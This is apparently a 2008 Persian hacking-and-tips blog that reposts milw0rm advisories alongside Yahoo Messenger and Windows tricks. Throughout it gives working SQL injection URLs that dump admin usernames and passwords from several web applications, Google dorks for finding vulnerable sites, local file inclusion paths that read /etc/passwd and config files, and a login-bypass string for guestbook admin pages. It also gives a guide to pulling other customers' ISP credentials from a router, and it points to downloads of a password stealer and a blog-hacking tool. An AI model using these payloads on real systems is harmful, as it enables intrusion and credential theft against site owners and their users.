|
|
|
|
|
دیگه نمی دونم چی بذارم خودتون بگین
| +| نوشته شده توسط
محمد در جمعه سی ام فروردین 1387
| |
| | | |
|
|
|
|
--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
--==+ Classifieds Caffe (index.php cat_id) Remote SQL Injection +==--
--==+====================================================================================+==--
[+] [JosS] + [Spanish Hackers Team] + [Sys - Project]
[+] Info:
[~] Software: Classifieds Caffe
[~] Exploit: Remote SQL Injection [High]
[~] Where: index.php
[~] Bug Found By: JosS
[~] Contact: sys-project[at]hotmail.com
[~] Web: http://www.spanish-hackers.com
[+] Exploit:
[~] /index.php?action=add&cat_id=[SQL]
[~] 7'+union+all+select+0,1,convert(concat(database(),char(58),user(),char(58),version()),char),3/*
--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
--==+ JosS +==--
--==+====================================================================================+==--
[+] [The End]
# milw0rm.com [2008-04-15]
| +| نوشته شده توسط
محمد در پنجشنبه بیست و نهم فروردین 1387
| |
| | | |
|
|
|
|
اینم ترفند جدید ویندوز اکس پی
برای دیدنش به ادامه مطالب بروید به صورت عکس است
ادامه مطلب| +| نوشته شده توسط
محمد در چهارشنبه بیست و هشتم فروردین 1387
| |
| | | |
|
|
|
|
##########################################
#
# Koobi Pro 6.25 poll Remote SQL Injection Vulnerability
#
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
##WEBSiTE: http://www.xcorpitx-hack.com/Forum/
####BLOG : http://my.opera.com/SQL-Injection/blog/
####MAiL : hackturkiye.hackturkiye@gmail.com
#
###########################################
#
# DORK 1 : allinurl: "index.php?p=poll"showresult
#
# DORK 2 : allinurl: poll_id "showresult"
#
###########################################
EXPLOiT :
index.php?p=poll&showresult=1&poll_id=-1+union+select+concat(email,0x3a,pass),1,2,3+from+kpro_user
*********************************************
WEBSiTE: http://www.xcorpitx-hack.com/Forum
*********************************************
********************S@BUN********************
*********************************************
# milw0rm.com [2008-04-14]
| +| نوشته شده توسط
محمد در چهارشنبه بیست و هشتم فروردین 1387
| |
| | | |
|
|
|
|
برای کسب در آمد بیشتر در حدود روزانه از ۲ هزار تومان گرفته تا ۵۰ هزار تومان مطالب این لینک را مطالئه کنید
اینجا کلیک کنید | +| نوشته شده توسط
محمد در سه شنبه بیست و هفتم فروردین 1387
| |
| | | |
|
|
|
|
##########################################
#
# Koobi Pro 6.25 poll Remote SQL Injection Vulnerability
#
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
##WEBSiTE: http://www.xcorpitx-hack.com/Forum/
####BLOG : http://my.opera.com/SQL-Injection/blog/
####MAiL : hackturkiye.hackturkiye@gmail.com
#
###########################################
#
# DORK 1 : allinurl: "index.php?p=poll"showresult
#
# DORK 2 : allinurl: poll_id "showresult"
#
###########################################
EXPLOiT :
index.php?p=poll&showresult=1&poll_id=-1+union+select+concat(email,0x3a,pass),1,2,3+from+kpro_user
*********************************************
WEBSiTE: http://www.xcorpitx-hack.com/Forum
*********************************************
********************S@BUN********************
*********************************************
# milw0rm.com [2008-04-14]
| +| نوشته شده توسط
محمد در سه شنبه بیست و هفتم فروردین 1387
| |
| | | |
|
|
|
|
برای دانلود آهنگهایی که به صورت مدیا ژلیر گذاشته شده اند و فقط برای گوش دادن هستند روی عکس مدیا پلیر راست کلیک کرده و دکمه Properties را بزنید و در شکلی که ظاهر می شه لینک مورد نظر درج شده که آهنگ رو باید از آنجا دانلود کنید
تقدیم به مرجان که در خواست کرده بودن | +| نوشته شده توسط
محمد در سه شنبه بیست و هفتم فروردین 1387
| |
| | | |
|
|
|
|
دیگه چی بذارم خودتون بگید تو نظرات هرچی بخوایین بنویسید اگه بتونم می ذارم
| +| نوشته شده توسط
محمد در دوشنبه بیست و ششم فروردین 1387
| |
| | | |
|
|
|
|
############################################
#
# Pollbooth v2.0 SQL Injection Vulnerability
#
############################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
##WEBSiTE: http://www.xcorpitx-hack.com/Forum/
####BLOG : http://my.opera.com/SQL-Injection/blog/
###############################################
#
# DORK 1 : allinurl: "pollBooth.php?op=results"pollID
#
#############################################
EXPLOiT :
pollBooth.php?op=results&pollID=-1+union+select+password,1,2,3+from+users
*********************************************
WEBSiTE>>>http://www.xcorpitx-hack.com/Forum/
*********************************************
********************S@BUN********************
*********************************************
# milw0rm.com [2008-04-13]
| +| نوشته شده توسط
محمد در دوشنبه بیست و ششم فروردین 1387
| |
| | | |
|
|
|
|
خوب بریم سر آموزش امروز : - TCP و UDP چيست؟
مدل TCP/IP که برای ارتباط اينترنتی بهکار میرود، میتوان به لايههای مختلفی تقسيمبندی کرد که بعدا بيشتر توضيح میدم، اما يکی از اين لايهها، لايه ارتباط host2host است که خود شامل دو پروتکل است به نامهای TCP و UDP :
۱- (TCP (Transmission Control Protocol :
اين پروتکل قویتر و قابل اعتمادتر است و اصولا پروتکل مهمتری نسبت به UDP محسوب میشود. اين پروتکل توانايی بازبينی بستههاو کنترل خطا را هم دارد.
۲- (UDP (User Datagram Protocol :
اين پروتکل برای کاهش overflow طراحی شده است و در خيلی از موارد وابسته به TCP است.
نکته مهم اين است که وقتی با يک پورت خاص روی يک کامپيوتر ديگر ارتباط برقرار میکنيم، اين ارتباط میتواند از نوع TCP يا UDP باشد. بنابراين وقتی میخواهيم يک کامپيوتر خاصی را از نظر پورتها بررسی کنيم، هردو بايد بررسی شود.
- تقسيمبندی پورتها از روی شماره آنها
۱- پورتهای 0 تا 1023 :
مشهورترين پورتها هستند و معمولا هرکدام برای يک سرويس خاص استفاده میشود. با تعدادی از اين پورتها در جلسات قبل آشنا شدهايد.
۲- پورتهای 1024 تا 49151 :
اين سری از پورتها مشخصا با هيچيک از سرويسهای اينترنتی مرتبط نيستند بلکه وقتی که با يک ابزار شبکه مانند مرورگر اينترنت(مثل Internet Explore يا Netscape Navigator )، نرمافزار ارسال و دريافت E-mail (مثل Outlook يا Edura )، نرمافزارهای FTP (مثل WS-FTP يا Cute-FTP ) کار میکنيد، يکی از اين پورتها به صورت random باز شده و يک ارتباط با سرور (با توجه بهنوع سرويس اينترنتی که میدهد که يکی از پورتهای 0 تا 1023 است) برقرار شده و دادهها ارسال و دريافت میشوند. يعنی پورت شما يکی از پورتهای اين قسمت است و پورت سرور يکی از پورتهای بالايی.اين سری پورتها را پورتهای register شده هم میگويند.
۳- پورتهای 49152 تا 65535 :
اين سری از پورتها بهندرت استفاده میشوند. کاربرد اساسی آنها برای يک سری سرويسهای خاص اينترنتی است و يا توسط trojanها (که برای Hack کردن کامپيوتر است) است. البته خيلی از trojanهای معروف از پورتهای رديف ۲ هم استفاده میکنند و اين تقسيمبندیها هميشه برقرار نيست و بههمين علت است که گاهی پورتها را به دودسته زير 1024 و بالای 1024 تقسيم میکنند.
- تکميل ليست پورتها
در جلسه دوم در مورد مهمترين پورتها صحبت کردم. حالا يک ليست کاملتر را در اين درس میگم. اگر میخواهيد يک مرجع نسبتا کامل برای مراجعه داشته باشيد، اينجا را کليک کنيد. دقت کنيد درس امروز و نيز لينک بالا هيچ بحثی در مورد تروجانها نمیکند زيرا تروجانهای شناخته شده هم يک سری پورت پيشفرض دارند که در جای خود بحث خواهد شد.
Ports TCP/UDP Service or Application
------ ------- ----------------------------------------
7 tcp echo
11 tcp systat
19 tcp chargen
21 tcp ftp-data
22 tcp ssh
23 tcp telnet
25 tcp smtp
42 tcp nameserver
43 tcp whois
49 udp tacacs
53 udp dns-lookup
53 tcp dns-zone
66 tcp oracle-sqlnet
69 udp tftp
79 tcp finger
80 tcp http
81 tcp alternative for http
88 tcp kerberos or alternative for http
109 tcp pop2
110 tcp pop3
111 tcp sunrpc
118 tcp sqlserv
119 tcp nntp
135 tcp ntrpc-or-dec
139 tcp netbios
143 tcp imap
161 udp snmp
162 udp snmp-trap
179 tcp bgp
256 tcp snmp-checkpoint
389 tcp ldap
396 tcp netware-ip
407 tcp timbuktu
443 tcp https/ssl
445 tcp ms-smb-alternate
445 udp ms-smb-alternate
500 udp ipsec-internet-key-exchange (ike)
513 tcp rlogin
513 udp rwho
514 tcp rshell
514 udp syslog
515 tcp printer
515 udp printer
520 udp router
524 tcp netware-ncp
799 tcp remotely possible
1080 tcp socks
1313 tcp bmc-patrol-db
1352 tcp notes
1433 tcp ms-sql
1494 tcp citrix
1498 tcp sybase-sql-anywhere
1524 tcp ingres-lock
1525 tcp oracle-srv
1527 tcp oracle-tli
1723 tcp pptp
1745 tcp winsock-proxy
2000 tcp remotely-anywhere
2001 tcp cisco-mgmt
2049 tcp nfs
2301 tcp compaq-web
2447 tcp openview
2998 tcp realsecure
3268 tcp ms-active-dir-global-catalog
3268 udp ms-active-dir-global-catalog
3300 tcp bmc-patrol-agent
3306 tcp mysql
3351 tcp ssql
3389 tcp ms-termserv
4001 tcp cisco-mgmt
4045 tcp nfs-lockd
5631 tcp pcanywhere
5800 tcp vnc
6000 tcp xwindows
6001 tcp cisco-mgmt
6549 tcp apc
6667 tcp irc
8000 tcp web
8001 tcp web
8002 tcp web
8080 tcp web
9001 tcp cisco-xremote
12345 tcp netbus
26000 tcp quake
31337 udp backorifice
32771 tcp rpc-solaris
32780 udp snmp-solaris
43188 tcp reachout
65301 tcp pcanywhere-def
- چگونه به يک پورت Telnet کنيم؟
برای اينکه عملکرد يک پورت برای شما روشن شود، بايد به آن پورت Telnet کنيد. (البته معمولا تعدادی از پورتهايی را که ممکن است اطلاعاتی مهم را در اختيار هکرها قرار دهند مثل پورت ۷۹ معمولا بسته است و ارتباط با آنها شايد برقرار نشود.) برای telnet کردن در command prompt دستور زير را تايپ کنيد:
telnet hostname portnum
در اين دستور بهجای hostname شماره ip و يا نام سايت را وارد میکنيد و بهجای portnum شماره پورت و يا معادل آن از جدول. مثلا برای تلنت کردن به پورت ۱۳ که ساعت و تاريخ را بهدست میدهد در کامپيوتری به اسم www.iums.ac.ir مينويسيد:
telnet iums.ac.ir 13
telnet iums.ac.ir daytime
هر دو اين دستورات معادل هم هستند.
تلنت کردن معمولا اولين کاری است که يک هکر برای هک کردن يک سايت انجام میدهد، زيرا بعضی از پورتها در صورت بسته نبودن روی آن سرور، معمولا حاوی اطلاعات بسيار مهمی هستند.
همين الان شروع کنيد و مثل يک هکر واقعی به کامپبوترهای مختلف و پورتهای گوناگون تلنت کنيد
منبع:http://www.amirihackerr.blogfa.com | +| نوشته شده توسط
محمد در یکشنبه بیست و پنجم فروردین 1387
| |
| | | |
|
|
|
|
برای هک سایت های php عبارت زیر را در google جستجو کنید
عبارتی که باید آنرا جستجو کنید :
powered by Advanced Guestbook 2. + inurl:guestbook/admin.php
يا
inurl:guestbook + inurl:admin.php
و به جای رمز عبارت زیر را وارد کنید
OR ('a' = 'a ('
منبع:http://www.amirihackerr.blogfa.com | +| نوشته شده توسط
محمد در یکشنبه بیست و پنجم فروردین 1387
| |
| | | |
|
|
|
|
اینم یه پسورد سندر قوی به نام JPS با حجم کم برای دانلود به ادامه مطالب بروید
ادامه مطلب| +| نوشته شده توسط
محمد در یکشنبه بیست و پنجم فروردین 1387
| |
| | | |
|
|
|
|
این سورس کد یه ماشین حساب حرفه ای هستش که در ویزوال بیسیک نوشته شده همراه با فایل اجرایی با حجم کم
دانلود در ادامه مطالب
ادامه مطلب| +| نوشته شده توسط
محمد در یکشنبه بیست و پنجم فروردین 1387
| |
| | | |
|
|
|
|
اینم یه بوتر دیگه که با حجم کم برای دانلود به ادامه مطالب بروید.
ادامه مطلب| +| نوشته شده توسط
محمد در یکشنبه بیست و پنجم فروردین 1387
| |
| | | |
|
|
|
|
اینم از چند تا آیکون زیبا که تو برنامه نویسی به درد می خوره برای دانلود به ادامه مطالب بروید
حجمش خیلی کمه
ادامه مطلب| +| نوشته شده توسط
محمد در یکشنبه بیست و پنجم فروردین 1387
| |
| | | |
|
|
|
|
##########################################
#
# Provozováno na RS MAXSOFT SQL-Injection
#
# PAGE:http://redakcni-system.maxsoft.cz/
#
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
#
####BLOG : http://my.opera.com/SQL-Injection/blog/
#
#
###########################################
#
# DORK 1 : "RS MAXSOFT"
#
# DORK 2 : "Provozováno na RS MAXSOFT"
#
###########################################
you will see adminname and password on title
EXPLOiT:
modules/fotogalerie/popup_img.php?fotoID=-1+union+select+concat(login,0x3a,pass)+from+admin
ADMiN LOGiN=admin.php?page=logfrm
###########################################
------------------S@BUN-------------------#
###########################################
###########################################
--http://my.opera.com/SQL-Injection/blog/-#
###########################################
# milw0rm.com [2008-04-10]
| +| نوشته شده توسط
محمد در یکشنبه بیست و پنجم فروردین 1387
| |
| | | |
|
|
|
|
اگه بخواهید هر پیغامی که می فرستید در یاهو برای طرف مقابل در یه صفحه جدید باز بشه باید کلید Im رو در یاهو بزنید و بعد ID طرف مقابل رو بنویسید و در آخر آن بنویسید ++ یعنی دو تا علامت + بذارید
در این صورت هر پیغام شما برای اون در یک صفحه جدید باز می شه | +| نوشته شده توسط
محمد در شنبه بیست و چهارم فروردین 1387
| |
| | | |
|
|
|
|
برای بوت سریع بدون نیاز به نرافزار خاصی اونم تو یاهو باید کلید های ترکیبی Ctrl+Shift+R رو بزنید
| +| نوشته شده توسط
محمد در شنبه بیست و چهارم فروردین 1387
| |
| | | |
|
|
|
|
##########################################
#
# Provozováno na RS MAXSOFT SQL-Injection
#
# PAGE:http://redakcni-system.maxsoft.cz/
#
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
#
####BLOG : http://my.opera.com/SQL-Injection/blog/
#
####MAiL : hackturkiye.hackturkiye@gmail.com
#
###########################################
#
# DORK 1 : "RS MAXSOFT"
#
# DORK 2 : "Provozováno na RS MAXSOFT"
#
###########################################
you will see adminname and password on title
EXPLOiT:
modules/fotogalerie/popup_img.php?fotoID=-1+union+select+concat(login,0x3a,pass)+from+admin
ADMiN LOGiN=admin.php?page=logfrm
###########################################
------------------S@BUN-------------------#
###########################################
-----hackturkiye.hackturkiye@gmail.com----#
###########################################
--http://my.opera.com/SQL-Injection/blog/-#
###########################################
# milw0rm.com [2008-04-10]
| +| نوشته شده توسط
محمد در شنبه بیست و چهارم فروردین 1387
| |
| | | |
|
|
|
|
:::::::-. ... ::::::. :::.
;;, `';, ;; ;;;`;;;;, `;;;
`[[ [[[[' [[[ [[[[[. '[[
$$, $$$$ $$$ $$$ "Y$c$$
888_,o8P'88 .d888 888 Y88
MMMMP"` "YmmMMMM"" MMM YM
[ Discoverd by dun \ dun[at]strcpy.eu ]
#####################################################
# [ Ksemail ] Local File Include Vulnerability #
#####################################################
#
# Script site: http://www.ksemail.com/, http://mail.ksemail.com
#
# Vuln:
# http://site.com/prog/index.php?language=../../../../../../etc/passwd
# http://site.com/prog/index.php?lang=../../../../../../etc/passwd
#
# Dork example: "FoxMail/Outook"
#
###############################################
# Greetz: D3m0n_DE, nejman, sid_psycho
# and all otherz.. [;
###############################################
[ dun / 2008 ]
********************************************************************************************
# milw0rm.com [2008-04-10]
| +| نوشته شده توسط
محمد در شنبه بیست و چهارم فروردین 1387
| |
| | | |
|
|
|
|
وقتی با یک نفر Chat می کنید از کجا می فهمید طرف مقابل شما را در لیست خود Add کرده است یانه؟ کافی است به طرف مقابل یک PM بدهیم و هنگامی که جواب طرف مقابل رسید به بالای پنجره ی مخصوص PM نگاه کنید. دو حالت ممکن است رخ دهد:
۱.اگر طرف مقابل شما را در لیستش نداشته باشد، در بالای صفحه به صورت زیر اسم ها را مشاهده خواهیم کرد: Yahoo Send ID Instant Messenger در این صورت می بینید که بین ID دوست شما و Instant Messenger فقط یک خط وجود دارد که این نشان می دهد که طرف مقابل شما را Add نکرده است.
۲.اگر بین ID دوست شما و Instant Messenger دو خط دیده شود مانند: Yahoo Send ID…Instant Messenger در این صورت ID شما در لیست دوستان تان وجود دارد. | +| نوشته شده توسط
محمد در جمعه بیست و سوم فروردین 1387
| |
| | | |
|
|
|
|
با مراجعه به آدرس زیر میتوانید بدون نصب یاهو مسنجر به روی سیستم خود از طریق سرور یاهو با یوزر خود لاگین کنید
چند نمونه مزیت این سیستم به سیستمهای تبلیغاتی :
امکان داشتن آفلاین
امکان ادد کردن آی دی دیگران
محیط کاملا شبیه به مسنجر
دیده شدن استات دیگران در پنجره مرورگر !
امکان مرور history مسنجر
امکان تغییر گروه آی دی و .....
ورود به نسخه وب یاهو مسنجر!
| +| نوشته شده توسط
محمد در جمعه بیست و سوم فروردین 1387
| |
| | | |
|
|
|
|
| | ارسال BUZZ به شکل پشت سر هم برای طرف مقابل | یکی از توانمندی های یاهو مسنجر هنگام چت استفاده از دکمه BUZZ به نوعی برای آزار طرف مقابل است! اما خود یاهو این گزینه را به نوعی تنظیم کرده است که پس از زدن دکمه تا 15 ثانیه امکان استفاده مجدد از آن وجود ندارد. در این ترفند قصد داریم روشی جالب را به شما معرفی کنیم که با بهره گیری از آن میتوانید بدون استفاده از برنامه جانبی خاصی به نوعی این محدودیت زمانی را از بین ببرید و به شکل پیاپی و پشت سر هم برای طرف مقابل BUZZ بفرستید!
برای این کار:
کافی است پس از انتخاب ID شخص از روی لیست و باز شدن پنجره PM ، یکبار دکمه BUZZ را بزنید.
اکنون به شکل سریع پنجره چت را بسته و مجدد روی ID شخص را باز کنید و BUZZ بزنید.
اگر این کار - یعنی باز و بسته کردن پنجره چت فرد مقابل و زدن دکمه BUZZ - را به شکل پشت سر هم و سریع انجام دهید به تعداد دفعات اینکار عمل BUZZ برای فرد مقابل صورت میگیرد.
فرد مقابل نیز اصلأ متوجه نمیشود که شما هر بار پنجره چت را میبندید و باز میکنید.
منبع:ترفندستان دات کام |
| +| نوشته شده توسط
محمد در جمعه بیست و سوم فروردین 1387
| | | | |
|
|
|
|
برای فرستادن یک پیغام به تمام یوزر های یک شبکه باید مراحل زیر را به ترتیب انجام دهید.
۱- از منوی start بر روی گزینه run کلیک کنید. تا داس تحت ویندوز برای شما باز شود.
۲-در این مرحله شما باید کلمه :c نوشته و Enter را بزنید.
۳- حالا برای فرستادن یا پیغام باید خط زیر را وارد کنید.
NET SEND * SALAM
گزینه * نمایان گر این است که پیغام سلام برای همه ی یوزر ها فرستاده میشود.
به جای SALAM هم شما میتوانید هر متنی را که دوست داشتید بنویسید.
---> برای فرستادن پیغام برای یکی از یوزر ها شما باید COMPUTER NAME یوزر مورد نظر در قسمت * وارد کنید در این صورت پیغام شما فقط برای یوزر مورد نظر فرستاده میشود.
برای مثال اگر COMPUTER NAME یوزر مورد نظر شما FREE-AMOZESH بود باید متن زیر را بنویسید.
NET SEND FREE-AMOZESH SALAM
بین هر کلمه باید یک SPACE بزنید.
منبع:http://www.free-amozesh.blogsky.com |
| +| نوشته شده توسط
محمد در جمعه بیست و سوم فروردین 1387
| | | | |
|
|
|
|
##########################################
#
# Provozováno na RS MAXSOFT SQL-Injection
#
# PAGE:http://redakcni-system.maxsoft.cz/
#
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
#
####BLOG : http://my.opera.com/SQL-Injection/blog/
#
#
###########################################
#
# DORK 1 : "RS MAXSOFT"
#
# DORK 2 : "Provozováno na RS MAXSOFT"
#
###########################################
you will see adminname and password on title
EXPLOiT:
modules/fotogalerie/popup_img.php?fotoID=-1+union+select+concat(login,0x3a,pass)+from+admin
ADMiN LOGiN=admin.php?page=logfrm
###########################################
------------------S@BUN-------------------#
###########################################
-----hackturkiye.hackturkiye@gmail.com----#
###########################################
--http://my.opera.com/SQL-Injection/blog/-#
###########################################
# milw0rm.com [2008-04-10]
| +| نوشته شده توسط
محمد در جمعه بیست و سوم فروردین 1387
| |
| | | |
|
|
|
|
هک کارت اینترنت با یه روش دیگه (دفعه ی قبل هک کارت اینترنت رو با یه برنامه بهتون یاد دادم ولی این با خود ویندوزه) نظر یادتون نره
هک آی اس پی(کارت اینترنت)
می خوام بهتون برنامه ای معرفی کنم و طریقهء استفاده از اون را براتون بنویسم که همه ی کاربران ویندوز ایکس پی اون برنامه را می شناسند و یا تو کامپیوتر خود دارند ولی ازش استفاده نمی کنند.
این برنامه ی جالب هایپرترمینال HyperTerminal هستش.این برنامه رو از آدرس زیر میتونید پیدا کنید.
Start Menu\All Programs\Accessories\Communications\HyperTerminal
در کل کار این برنامه فرستادن و گرفتن فایل و چت و ارتباط بین دو کامپیوتر بدون استفاده از کارت اینترنت هست. یعنی دو تا کامپیوتر می تونن توسط اون با همدیگر ارتباط برقرار کنن و فایلهایی را برای هم بفرستن.اگه آموزش هایپر ترمینال هم خواستید تو نظرات بگید تا هر چه زودتر براتون بزارم تو وبلاگ.چون کارای جالبی با این برنامه میشه انجام داد.
حالا بریم سر اصل مطلب: ابتدا برنامه را اجرا کنید. در این قسمت یک اسمی برای ارتباط خودتون وارد کنید. فرقی نمی کنه چه باشه. در قسمت دوم شماره تلفن ISP تون رو بنویسید که می خواهید هکش کنید.
حالا با زدن دکمه ی Conect شما به آی اس پی تون وصل میشید . حالا با زدن کلید اینتر یه چیزهایی تو صفحه ی سفید برنامه نوشته می شوند که اگر نامفهوم بود یک آی اس پی دیگه را امتحان کنید و اگر قابل فهم بود چیزهایی مثل این را مشاهده کردید که همگی بستگی به اون شرکت داره اما زیاد تفاوتی نمی کنن.
Welcome To ROUTER
Username :
PassWord :
شما حتما باید یک کارت اینترنت داشته باشید از اون شرکت تا بتونید وارد سیستمش بشید . که تو اینجا با وارد کردن اسم رمز و پسورد (پسورد وقتی می خواهید بنویسید دیده نمیشه چیزهایی مثل اعلان داس را میبینید:
Router  _
حال شما به مرحلهء حساسی وارد شدید که خیلی مهمه. بله اینجا قلب سیستم هستش یعنی شما با نوشتن چیزهایی که میگم می تونید اطلاعات مهم و حیاطی از اون شرکت را بدست بیارید از جمله شماره ی کارت اینترنت کسایی که روی خط هستن و شماره ی آی پی (درباره ی آی پی IP فعلا چیزی نمیگم ولی اگه خواستین تو نظرات بگید تا براتون آموزش رو براتون بزارم)
در اینجا چند تا از فرمانهای حساس اون رو براتون توضیح می دم :
Systat با نوشتن این فرمان اطلاعاتی از کلیهء اسم رمزهای کسایی که روی خط هستن را براتون نمایش می ده.
Login با صادر کردن این فرمان می تونید به آی پی های دیگران وصل شوید.
Help نمایش کلیهء فرمانهای مجاز.
نکته ی مهم که باید بگم اینه که در این نوع ارتباط فرمانهایی وجود دارن مثل ایجاد حساب و یا حذف حساب که شما نمی تونید این کارها رو انجام بدید. برای این کار باید اسم رمز خاصی را در اول برنامه بنویسید که اون هم در اختیار صاحب آی اس پی هست.
حالا با این روش شما میتونید اینترنت مجانی استفاده کنید البته اگه وجدان دارید نکنید .دلتون میاد یکی همین بلا رو سر شما بیاره؟
منبع:http://download2.ir
| +| نوشته شده توسط
محمد در پنجشنبه بیست و دوم فروردین 1387
| |
| | | |
|
|
|
|
ما در اینجا یک سرور رو که یه سری سایت رو نگه داری می کنه هک می کنیم یعنی IIS اون نصب باشه
1- اشنايي با شبكه كه خب همينطور كه اكثر شما ميدونين از دونستن اطلاعات مقدماتي در مورد TCP/IP و لايه هاي مختلفش شروع ميشه كه هميشه پيشنهاد شده براي درك بهتر اين مبحث اول به بررسي 7 لايه مرجع OSI يا همون open system Interconnection بپردازيم بعد بريم سراغ 4 لايه TCP/IP بعد از اشنايي با لايه ها ما بايد با مفهوم IP يا همون Internet protocol اشنا بشيم يعني بدونيم ساختار يك IP چيه و بسته هاي IP چي هستند و چه جوري ميتونيم بفهميم كه يك IP ماله چه كلاسي هست (A,b,..) بعد با مفهوم پورت ها و اينكه هر پورت وظيفش چيه و ........ و مسلما هر چي بيشتر بدونيم در مورد شبكه مارو در نفوذ كمك ميكنه
2- بعد ما اصلا ميخوايم چيكار كنيم ايا هدفمون از كار انداختن يك سرويس دهنده هست كه باز بحث DOS يا Denial Of Service پيش مياد يا اينكه نفوذ از يك اسيب پذيري خاص مثلا يك سريز شدن بافر كه بحث اسيب شناسي پيش مياد
3 - اصلا چه جوري ما اين اسيب پذيري ها رو پيدا كنيم؟ ما بايد بشنيم با يك vul scanner سرويس دهنده مورد نظر رو تست كنيم مثل Nessus يا برنامه هاي ديگه گيريم اسيب پذيري رو پيدا كرديم حالا مسئله اينه كه چه جوري بايد استفاده كنيم از اين حفره
نكته : يه چيزي كه اصلا بهش توجه نميشه و همه دنبال محيط هاي گرافيكي و زدن يكي دوتا كليد ساده هستن اشنايي با Command Prompt هست مثلا وقتي يك نفر نتونه حتي از طريق داس ليست فايل ها و فولدر هاي يك درايو رو ببينه چه جوري ميخواد با netcat كار كنه!؟ پس ياد گيري داس هم يكي از فاكتورهاي مهم هست
4 - حالا ما ممكن بخوايم يك Backdoor نصب كنيم ؟ بايد بدونيم كه چه چيزي لازم داريم ميتونه netcat باشه كه نقش يك درب پشتي رو ايفا كنه يا BO2K و......
5 - ممكن مثلا سايت هدف از ديتابيس SQL استفاده كنه كه باز ما بايد با دستورات SQL تا حدي اشنا باشيم و بدونيم چه جوري عمل SQL INJECTION رو انجام بديم حداقل بونيم QUERY چيه!
6 - از همه مهمتر شما بايد با يك زبان برنامه نويسي مثل C اشنا باشيد يا حداقل اصول برنامه نويسي رو بدونيد چون همش نميشه از ابزارهاي اماده استفاده كرد
بيبن بحث در اين باره خيلي مفصله اگه ميبيني يه سري از سايت ها مثل اب خوردن هك ميشن مثلا سايت هايي كه از نواك استفاده ميكنن به نظر من نه اين كار هك كردن اسمشه نه اون بنده خدايي كه اين كار و كرده هكر! چون يه عده ادم باهوش و حرفه اي ميان مشكلات اين برنامه ها رو پيدا ميكنن و نه تنها براي تخريب بلكه براي بهبود امنيت در اختيار ديگران قرار ميدن و يه سري هم هستن كه هر روز سايت هايي مثل Security focus رو چك ميكنند به محضي كه يك كد اماده پيدا كردن شروع ميكنن مثلا هك كردن سايت هاي ديگران كه خب اگه اينكارشون بدون خرابكاري و پاك كردن اطلاعات باشه باز خوبه اونوقت مدير سايت ميره مشكلات رو برطرف ميكنه نه اينكه ور داره هر چي اطلاعات داره سايت پاك كنه!
چون ميدونم خيلي ها دنبال اين مباحث هستن من مسئوليت اموزش كامل شبكه رو بر عهده ميگرم و طي حدود 15 مقاله سعي ميكنم تمام موضوعات مورد نظر رو بگم ايشالا از اساتيد گروه يكيشون همت ميكنه و اموزش هك و امنيت رو ميده من توضيحات بالا رو نگفتم براي اينكه تو دل شما رو خالي كنم ولي اين يك حقيقت كه شما بايد راه درازي رو براي اين كار طي كنيد و هر روز به دنبال ياد گيري مسئله جديدي باشيد ميتونيد براي شروع از مقالاتي كه در مورد شبكه خواهم نوشت اغاز كنيد در كنارش يك زبان برنامه نويسي رو براي شروع بياموزيد خدارو شكر تو گروه دوستاني هستن كه به سوالات شما در زمينه برنامه نويسي پاسخ بدن اگرم كسي جواب نده باز ما مهدي رو داريم و مطمئنم از تجربياتش ميتونيد استفاده كنيد و سوالاتتونو بپرسين اصلا ما اين گروه رو از روز اول براي رفع مشكلات شما راه انداختيم تا اينجا كه اومديم ايشالا تا اخرشم هستيم به شرط اينكه بچه ها هم هواي مارو داشته باشن و كمكون كنن و مارو دست تنها نزارن و واقعا وضيعت كاري ما رو هم درك كنن خيليا بودن كه رفيق نيمه راه بودن واسه گروه يه جورايي اولش داغ بودن و بعد مارو ول كردن و شايد الان چند ماه هم بشه كه سري به سايت نزنن ولي نميخوام بگم هر چي دارن از مشهدتيم دارن ولي خودشون ميدونن و خداي بالا سرشون كه روزي كه تو گروه اومدن حتي كوچكترين مسئله رو هم بلد نبودن تمام بچه ها اطلاعاتشون در اختيار هم گذاشتن و مطمئنم و به اين موضوع ايمان دارم كه هيچ توقعي هم ندارن فقط تنها چيزي كه يك گروه از اعضاش ميخواد اينه كه فعاليتش مستمر باشه اونم در حد توانش حالا يه سري استثنا هم هستن كه واقعا مشكل براشون پيش اومد و نتونستن كار كنن باز دم بچه هايي كه از اول با ما بودن گرم و اين دوستاني كه جديد اضافه شدن به گروه خداشكر كه حداقل شما هيچ وقت پشت مشهدتيم رو خالي نميكنيد حتي اگه مطلب اموزشي نمينويسند ولي باز با گروه همراه هستن و سري به سايت ميزنن- به اميد موفقيت بيش از پيش براي مشهدتيم
منبع:http://www.mashhadteam.com | +| نوشته شده توسط
محمد در پنجشنبه بیست و دوم فروردین 1387
| |
| | | |
|
|
|
|
-------------------------------------------------------------------------
-- JIKI Team [ JIKO + KIl1er ] ---
-------------------------------------------------------------------------
# Author : jiko
# email : jalikom@hotmail.com
# Home : www.no-back.org
# Script : gallery-script-lite
# Bug : Remote Local File Inclusion Vulnerability
# Download : http://www.arwscripts.com/gallery-script-lite.html
# Dork : developed by ARWScripts.com
# file : download.html
# Error :
=========================JIkI Team===================
# Exploit :
http://[site]/[script]/download.html?path=
#ex :
download.html?path=config.inc.php
http://www.[site].com/demos/galleryscriptlite/download.html?path=config.inc.php
===========
greetz : all my friend and H-T Team and all No-back members and tryag.Com
visit: www.no-back.org & www.tryag.com
-------------------------------------------------------------------------
-- JIKI Team [ JIKO + KIl1er ] --
-------------------------------------------------------------------------
# milw0rm.com [2008-04-09]
| +| نوشته شده توسط
محمد در پنجشنبه بیست و دوم فروردین 1387
| |
| | | |
|
|
|
|
اين كد باعث پخش شدن 7 ستاره در صفحه ميشه
منبع:http://javaa.blogfa.com
| +| نوشته شده توسط
محمد در چهارشنبه بیست و یکم فروردین 1387
| |
| | | |
|
|
|
|
اینم از آموزش کرک برنامه به صورت pdf
برای دانلود به ادامه مطالب بروید
ادامه مطلب| +| نوشته شده توسط
محمد در چهارشنبه بیست و یکم فروردین 1387
| |
| | | |
|
|
|
|
اینم یه نرم افزار هک وبلاگ که هر وبلاگی رو هک می کنه
